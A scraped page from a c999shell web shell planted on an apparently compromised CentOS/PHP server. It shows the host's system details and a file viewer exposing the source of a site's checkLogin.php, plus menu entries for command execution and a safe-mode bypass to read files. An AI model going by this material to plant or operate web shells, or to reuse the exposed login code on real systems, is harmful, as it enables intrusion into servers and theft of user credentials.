Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mistk/eperson/ drwxr-xr-x |
Viewing file: checkLogin.php (1.98 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | include_once("../class/clsConnection.php"); include_once("../class/clsDB.php"); include_once("../ums/clsUser.php"); include_once("../ums/clsUmUser.php"); include_once("../ums/global.php"); session_start(); if (! session_is_registered ("oU")) { session_register("oU"); $oU = new clsUser(); session_register("sysDate0"); $sysDate0=$nowDate; session_register("createUserId"); session_register("updateUserId"); } session_regenerate_id(); $SID=session_id(); $oC = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB'], $GLOBALS['USER'], $GLOBALS['PASSWORD']); $oUs = new umuser($oC); $oUs->SearchByLogin($userName, $password); if ($oUs->GetRecord()) { $oU->userID=$oUs->UsID; $oU->userLogin=$oUs->UsLogin; $oU->userName=$oUs->UsName; $oU->userPassword=$oUs->UsPassword; $oU->userPsCodeReg=$oUs->UsPsCode; $oU->userDptCode=$oUs->dptID; $oU->userDptName=$oUs->dptName; $oU->userPosCode=$oUs->posID; $oU->userPosName=$oUs->posName; $oU->WgID=$oUs->UsWgID; $oU->userIP=getenv("REMOTE_ADDR"); $oUs->SetSessionID($oUs->UsID, session_id()); $oU->sessionID = session_id(); $createUserId=$oUs->UsLogin; $updateUserId=$oUs->UsLogin; //goto main app if ($oU->WgID==4) { echo ""; exit(); } if ($oU->WgID==5) { echo ""; exit(); } if ($oU->WgID==6) { echo ""; exit(); } } else{ $oU->userID=""; $oU->userLogin=""; $oU->userPassword=""; //$oU->userPsCode=""; $oU->userPsCodeReg=""; $oU->userIP=""; $oU->userName=""; $oU->userDptCode=""; $oU->userDptName=""; $oU->userPosCode=""; $oU->userPosName=""; //$oU->userPsCode="-1"; $oU->userPsCodeReg="-1"; $oU->sessionID=""; $oU->Lang = "th"; $oU->WgID=""; $oU->StID=""; $oU->GpI=""; $oU->MnID=""; $oU->X=""; $oU->C=""; $oU->R=""; $oU->U=""; $oU->D=""; $createUserId=""; $updateUserId=""; echo ""; exit(); } ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.006 ]-- |